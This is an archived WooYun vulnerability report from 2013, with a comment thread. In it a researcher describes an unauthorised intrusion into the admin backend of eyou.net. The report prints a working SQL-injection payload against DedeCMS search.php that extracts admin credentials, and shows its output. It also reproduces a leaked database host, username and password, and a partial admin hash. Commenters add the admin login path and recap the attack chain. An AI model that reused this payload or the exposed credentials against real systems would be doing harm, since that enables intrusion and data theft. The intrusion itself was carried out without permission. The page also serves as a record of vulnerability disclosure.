当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2013-021858

漏洞标题:亿中邮(亿邮)信息技术官方网站沦陷,已成功进入后台

相关厂商:北京亿中邮信息技术有限公司

漏洞作者: 钱途

提交时间:2013-04-14 23:00

修复时间:2013-05-29 23:01

公开时间:2013-05-29 23:01

漏洞类型:成功的入侵事件

危害等级:高

自评Rank:20

漏洞状态:厂商已经确认

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:


漏洞详情

披露状态:

2013-04-14: 细节已通知厂商并且等待厂商处理中
2013-04-16: 厂商已经确认,细节仅向厂商公开
2013-04-26: 细节向核心白帽子及相关领域专家公开
2013-05-06: 细节向普通白帽子公开
2013-05-16: 细节向实习白帽子公开
2013-05-29: 细节向公众公开

简要描述:

今天本身没事。为了不让他买叫我盲打王。 所以就打算随便找一个厂商 进行一次 脚本入侵。然后就找到了“亿中邮信息技术” 我大概说一下。没拿下webshell 后台设置了禁止写入。包括数据库备份 根本不可能。另外上传页面直接删除掉了。 但是你们网站的问题很大。 整个入侵过程一共是 20分钟。你们后台就沦陷了!·下面我大概讲一下入侵的整个思路

详细说明:

首先是网站主站有个意见反馈。然后我就很随意的 插入代码了。但是。返回的提交成功 一看就知道 dedecms页面。 然后我就知道。肯定是 失败的。 然后打开data/admin/ver.txt 发现版本很老啊。
然后测试打开http://www.eyou.net/data/mysql_error_trace.inc
的时候。我震惊了。这种是不可能出现的事情。 还是发生了。里面不光有后台地址。还有
5Bcfg_dbhost%5D=180.186.12.6&_COOKIE%5BGLOBALS%5D%5Bcfg_dbuser%5D=mysql&_COOKIE%5BGLOBALS%5D%5Bcfg_dbpwd%5D=qq1314520&_COOKIE%5BGLOBALS%5D%5Bcfg_dbname%5D=mysql&_COOKIE%5BGLOBALS%5D%5Bcfg_dbprefix%5D=dede_&nocache=true&QuickSearchBtn=%CC%E1%BD%BB
mysql一般情况下是链接不上的。 所以就不做测试了。除非他开启了%号。但是这个基本不太可能。当知道了版本 还知道了后台就更简单了。dedecms最近很火。各种注入 各种爆。 然后就找到了一个代码如下
plus/search.php?keyword=as&typeArr[111%3D@`\'`)+and+(SELECT+1+FROM+(select+count(*),concat(floor(rand(0)*2),(substring((select+CONCAT(0x7c,userid,0x7c,pwd)+from+`%23@__admin`+limit+0,1),1,62)))a+from+information_schema.tables+group+by+a)b)%23@`\'`+]=a
然后就出现了
Error infos: Duplicate entry '1|admin|e41aa72de59c63006aad' for key 'group_key'
去出md5 前3后1 不用我多说。 CMD解密的密码是1111aaaa 还是aaaa1111具体哪个我忘记了。大概就是这个。然后登陆成功登陆后台。在拿webshell的时候。发现
配置文件'/data/www_eyou_net/data/config.cache.inc.php'不支持写入,无法修改系统配置参数! 而且上传页面也删除了。不管是备份也好。 还是提交任意文章也好。全部都是这样。于是。我认为还是算了。万一 点错了 删除掉那个文件就不好了。下面是图片

漏洞证明:

1111.jpg


111.jpg

修复方案:

有礼物么?能不忽视么?能给 20分么?

版权声明:转载请注明来源 钱途@乌云


漏洞回应

厂商回应:

危害等级:中

漏洞Rank:10

确认时间:2013-04-16 10:10

厂商回复:

eyou.net目前并不涉及我们主要的业务数据,非常感谢反馈,我们正积极修补此问题。

最新状态:

暂无


漏洞评价:

评论

  1. 2013-04-14 23:03 | 鬼魅羊羔 ( 普通白帽子 | Rank:299 漏洞数:41 | (#‵′)凸(#‵′)凸(#‵′)凸(#‵′)凸(#‵...)

    你们来拷问我吧,我是知情者,我口风不紧的,很容易套出详情的。。。

  2. 2013-04-14 23:06 | cnrstar ( 普通白帽子 | Rank:157 漏洞数:20 | Be my personal best!)

    @鬼魅羊羔 哈哈,说出你知道,不然拖出去弹JJ弹5分钟

  3. 2013-04-14 23:17 | lucky ( 普通白帽子 | Rank:409 漏洞数:81 | 三人行必有我师焉########################...)

    牛呀!20分钟搞定入侵一个网站!

  4. 2013-04-14 23:19 | 钱途 ( 普通白帽子 | Rank:273 漏洞数:44 )

    @lucky 20分钟时保守估计 他这个站漏洞存在很严重。20分钟都算多的!·

  5. 2013-04-14 23:21 | 疯狗 认证白帽子 ( 实习白帽子 | Rank:44 漏洞数:2 | 阅尽天下漏洞,心中自然无码。)

    @钱途 20分钟,这可是传说中的亿邮啊,怎么也得21分钟才好

  6. 2013-04-14 23:36 | 小胖子 认证白帽子 ( 核心白帽子 | Rank:1727 漏洞数:125 | 如果大海能够带走我的矮丑...)

    data/admin/ver.txt 20100928 DEDE5.6 ~~~~

  7. 2013-04-14 23:39 | 冷静 ( 路人 | Rank:3 漏洞数:2 )

    楼上做得好

  8. 2013-04-14 23:41 | 小胖子 认证白帽子 ( 核心白帽子 | Rank:1727 漏洞数:125 | 如果大海能够带走我的矮丑...)

    @冷静 http://www.eyou.net/admin8/login.php 后台在这里,1分钟就能结束的战斗,你要20分钟,楼主,你怎么看~

  9. 2013-04-14 23:59 | YwiSax ( 实习白帽子 | Rank:62 漏洞数:4 | 淡定。)

    eYou得给力点啊。。。

  10. 2013-04-15 00:09 | 鬼魅羊羔 ( 普通白帽子 | Rank:299 漏洞数:41 | (#‵′)凸(#‵′)凸(#‵′)凸(#‵′)凸(#‵...)

    @小胖子 呵呵,不用显摆,钱途是从其他的地方开始看起,手工去找,最后才发现后台的,如果都像你一样,一上手就操起工具轮扫,碰见个有安全狗的,你这举动就显得很白痴了。

  11. 2013-04-15 00:09 | 鬼魅羊羔 ( 普通白帽子 | Rank:299 漏洞数:41 | (#‵′)凸(#‵′)凸(#‵′)凸(#‵′)凸(#‵...)

    @小胖子 你还是先减肥吧啊。。

  12. 2013-04-15 00:14 | 钱途 ( 普通白帽子 | Rank:273 漏洞数:44 )

    @小胖子 你的留言我早就看到了,说真话,我承认漏洞很简单,我也说明了,你也没必要,在这里显示你多厉害,你见过二哥,一哥,跑别人下面显示自己的能力?,你这样公布别人漏洞是根本不负责任,如果这个站是你的。你心里什么感受,

  13. 2013-04-15 00:21 | 鬼魅羊羔 ( 普通白帽子 | Rank:299 漏洞数:41 | (#‵′)凸(#‵′)凸(#‵′)凸(#‵′)凸(#‵...)

    @钱途 匿了吧,他要是懂的话,就不会这样显摆了。。晚安,钱总~~游戏机玩腻了,就送了吧,虽然家里地方不够大,放个游戏机有点挤,但是,我忍了。。

  14. 2013-04-15 00:24 | Blackeagle ( 实习白帽子 | Rank:62 漏洞数:10 | 向WooYun致敬)

    @小胖子 你过分了 亲

  15. 2013-04-15 00:53 | se55i0n ( 普通白帽子 | Rank:1567 漏洞数:172 )

    @小胖子 @鬼魅羊羔 @钱途 你们这些大黑阔呀,没事就日站.........................................................................................................................话说带上我,行么?

  16. 2013-04-15 01:01 | 小胖子 认证白帽子 ( 核心白帽子 | Rank:1727 漏洞数:125 | 如果大海能够带走我的矮丑...)

    @se55i0n @钱途 @鬼魅羊羔 亲,我没扫,只是看到了网站指纹识别,没开任何工具扫~~然后顺手加了两个地址,顺手!~真的是顺手~莫激动~~~~~~~~

  17. 2013-04-15 01:02 | 小胖子 认证白帽子 ( 核心白帽子 | Rank:1727 漏洞数:125 | 如果大海能够带走我的矮丑...)

    @鬼魅羊羔 减肥中!!!!!!!

  18. 2013-04-15 01:06 | 小胖子 认证白帽子 ( 核心白帽子 | Rank:1727 漏洞数:125 | 如果大海能够带走我的矮丑...)

    @钱途 @鬼魅羊羔 @Blackeagle @se55i0n @冷静 好嘛,我承认我错了嘛~深更半夜给各位大神跪下了嘛~~~~~~~~~~~羊羔跟前途肯定是好基友,漏洞细节都知道,就像我跟@z7y一样,再说了我又没说用户名和密码~

  19. 2013-04-15 01:22 | 淡漠天空 认证白帽子 ( 实习白帽子 | Rank:1113 漏洞数:141 | M:出售GOV STATE NSA CIA NASA DHS Symant...)

    6楼 过分了。。。。

  20. 2013-04-15 08:38 | Rookie ( 普通白帽子 | Rank:288 漏洞数:78 | 123)

    @鬼魅羊羔 既然你家里地方太小. 不如直接快递到我这里 我替你玩

  21. 2013-04-15 09:13 | 鬼魅羊羔 ( 普通白帽子 | Rank:299 漏洞数:41 | (#‵′)凸(#‵′)凸(#‵′)凸(#‵′)凸(#‵...)

    @se55i0n 就不带你玩。。。

  22. 2013-04-15 09:36 | 围剿 ( 路人 | Rank:17 漏洞数:5 | Evil decimal)

    一分钟结束战斗!战斗力不足五的渣渣。

  23. 2013-04-15 09:39 | 围剿 ( 路人 | Rank:17 漏洞数:5 | Evil decimal)

    http://www.eyou.net/data/mysql_error_trace.inc 严重暴露目标~

  24. 2013-04-15 10:33 | xsser 认证白帽子 ( 普通白帽子 | Rank:254 漏洞数:17 | 当我又回首一切,这个世界会好吗?)

    @围剿 到底多少分钟!!!

  25. 2013-04-15 10:38 | px1624 ( 普通白帽子 | Rank:1036 漏洞数:175 | px1624)

    这个必须学习加关注,钱总已经从盲打向渗透进军了诶。。

  26. 2013-04-15 10:52 | 三十度 ( 路人 | Rank:0 漏洞数:1 | 本屌精通各种花式撸管,装逼32式炉火纯青。...)

    @钱途 钱总...厉害求收徒

  27. 2013-04-15 11:34 | saline ( 普通白帽子 | Rank:231 漏洞数:29 | Focus On Web Secur1ty)

    data/mysql_error_trace.inc路径泄漏,search拿到密码散列,加之破解。目测网速除开以外,全部过程不到1分钟

  28. 2013-04-15 11:58 | 三十度 ( 路人 | Rank:0 漏洞数:1 | 本屌精通各种花式撸管,装逼32式炉火纯青。...)

    你们太坏了。把后台设置的那么死!!写不进东西。。。。你叫管理员情何以堪啊!!!

  29. 2013-04-15 12:59 | 坏虾 ( 路人 | Rank:28 漏洞数:5 | From Internet,For Internet……BY:坏虾)

    !!! 你们这帮禽兽!! 爆CMS版本,又爆后台,还好意思说没爆账号密码?

  30. 2013-04-15 13:00 | 坏虾 ( 路人 | Rank:28 漏洞数:5 | From Internet,For Internet……BY:坏虾)

    求乌云警告处分,不然会破坏掉这个圈子的。

  31. 2013-04-15 13:13 | iiiiiiiii ( 普通白帽子 | Rank:680 漏洞数:89 | )

    你们到底想干啥啊 人家亿邮惹你们了? 先给人家爆后台 再给人家爆密码 好玩么 想让人家被娱乐圈挂首页么? 想让人家被脱裤么? @saline @小胖子@围剿

  32. 2013-04-15 13:15 | zeracker 认证白帽子 ( 核心白帽子 | Rank:1068 漏洞数:134 | 多乌云、多机会!微信公众号: id:a301zls ...)

    官方未处理前,泄露信息违规?

  33. 2013-04-15 13:26 | 小胖子 认证白帽子 ( 核心白帽子 | Rank:1727 漏洞数:125 | 如果大海能够带走我的矮丑...)

    我又看了下评论,我说两句,鬼魅羊羔同学说我,你自己看看你多遵守乌云规则,自己的洞官方没处理就自己对外公布了,漏洞地址你们自己翻,说到信息泄露,我的洞列表里面有一个洞,官方没确认,有人连密码都说出来了,乌云藏龙卧虎,有的东西,用不着说泄露,看个标题连中学生都懂,有的东西,也用不着说泄露,说了也不懂,不多做解释了。

  34. 2013-04-15 13:32 | saline ( 普通白帽子 | Rank:231 漏洞数:29 | Focus On Web Secur1ty)

    @iiiiiiiii 仅仅是提供思路~晕死了~好吧,不参与了,让大牛见笑了

  35. 2013-04-15 14:11 | 鬼魅羊羔 ( 普通白帽子 | Rank:299 漏洞数:41 | (#‵′)凸(#‵′)凸(#‵′)凸(#‵′)凸(#‵...)

    @小胖子 呵呵,提前泄露信息是我的错,我承认,但是……我说的好像不是泄露信息的事情吧?你几分钟拿下后台,是你的本事,没必要拿出来显摆吧?还故意at下,挑衅呗?我反正是做不出这事儿。。你自己衡量吧。

  36. 2013-04-15 14:12 | 鬼魅羊羔 ( 普通白帽子 | Rank:299 漏洞数:41 | (#‵′)凸(#‵′)凸(#‵′)凸(#‵′)凸(#‵...)

    @小胖子 顺便说句,没修补就泄露,具体请指正。

  37. 2013-04-15 14:12 | 鬼魅羊羔 ( 普通白帽子 | Rank:299 漏洞数:41 | (#‵′)凸(#‵′)凸(#‵′)凸(#‵′)凸(#‵...)

    @小胖子 不要拿那有的没的说事儿。

  38. 2013-04-15 14:20 | 鬼魅羊羔 ( 普通白帽子 | Rank:299 漏洞数:41 | (#‵′)凸(#‵′)凸(#‵′)凸(#‵′)凸(#‵...)

    @小胖子 你别给我拿那有的没的事情说事儿,那个泄露,是因为腾讯之前在QQ上说没影响,忽略了,所以我才公布的,公布了以后,让网媒转了下,腾讯才重视的,没看我后面的评论吗?用不用我给你晒晒我和应急响应中心的聊天截图?还有,人家钱途用了多久,你跟人家比什么?那你怎么不提交,别人提交了,你上来嘲讽下,合适吗?这事儿就到此为止,谁对谁错,自己掂量吧。

  39. 2013-04-15 15:06 | 松子 ( 实习白帽子 | Rank:45 漏洞数:5 | 无事)

    黑客。求带。

  40. 2013-04-15 15:12 | 包子 ( 实习白帽子 | Rank:33 漏洞数:6 | 共同交流,共同进步)

    呵呵,谁吃饱撑的,把一些php文件给删了。。。不懂法律么

  41. 2013-04-15 15:45 | Drizzle.Risk ( 普通白帽子 | Rank:255 漏洞数:19 | You have an error in your SQL syntax; ch...)

    真乱啊.....我竟然看完了.. 其实都没对错,说来说去,我个人的感觉是,漏洞修补前,不要公布出去比较好.. 无论加班修补漏洞,或对漏洞负责的还是程序员或测试人员,不是BOSS们.. 屌丝何必难为屌丝

  42. 2013-04-15 16:31 | El4pse ( 路人 | Rank:29 漏洞数:7 | 世界上从来没有不可能这几个字,可不可能完...)

    23楼才是致命的

  43. 2013-04-16 11:57 | blrk ( 实习白帽子 | Rank:66 漏洞数:6 | 粪豆褶)

    @Drizzle.Risk 屌丝何苦为难屌丝

  44. 2013-04-25 19:31 | June ( 实习白帽子 | Rank:36 漏洞数:1 | 姐姐妳小时候给猪亲过啊?)

    尾楼广告招租

  45. 2013-05-02 10:09 | 乌云 ( 实习白帽子 | Rank:39 漏洞数:5 | 菜鸟一枚, </iframe>...)

    屌丝何苦为难屌丝

  46. 2013-05-30 08:16 | x1aoh4i ( 普通白帽子 | Rank:403 漏洞数:62 )

    @鬼魅羊羔 @小胖子 @钱途 @se55i0n 8位QQ求收徒 资历不差 接触半年了 求收徒

  47. 2013-05-30 08:57 | 鬼魅羊羔 ( 普通白帽子 | Rank:299 漏洞数:41 | (#‵′)凸(#‵′)凸(#‵′)凸(#‵′)凸(#‵...)

    @x1aoh4i 7位QQ,求你放开洞主。。

  48. 2013-05-30 09:00 | x1aoh4i ( 普通白帽子 | Rank:403 漏洞数:62 )

    @鬼魅羊羔 @钱途 鉴定完毕 好基友 有奸情 @se55i0n任务完成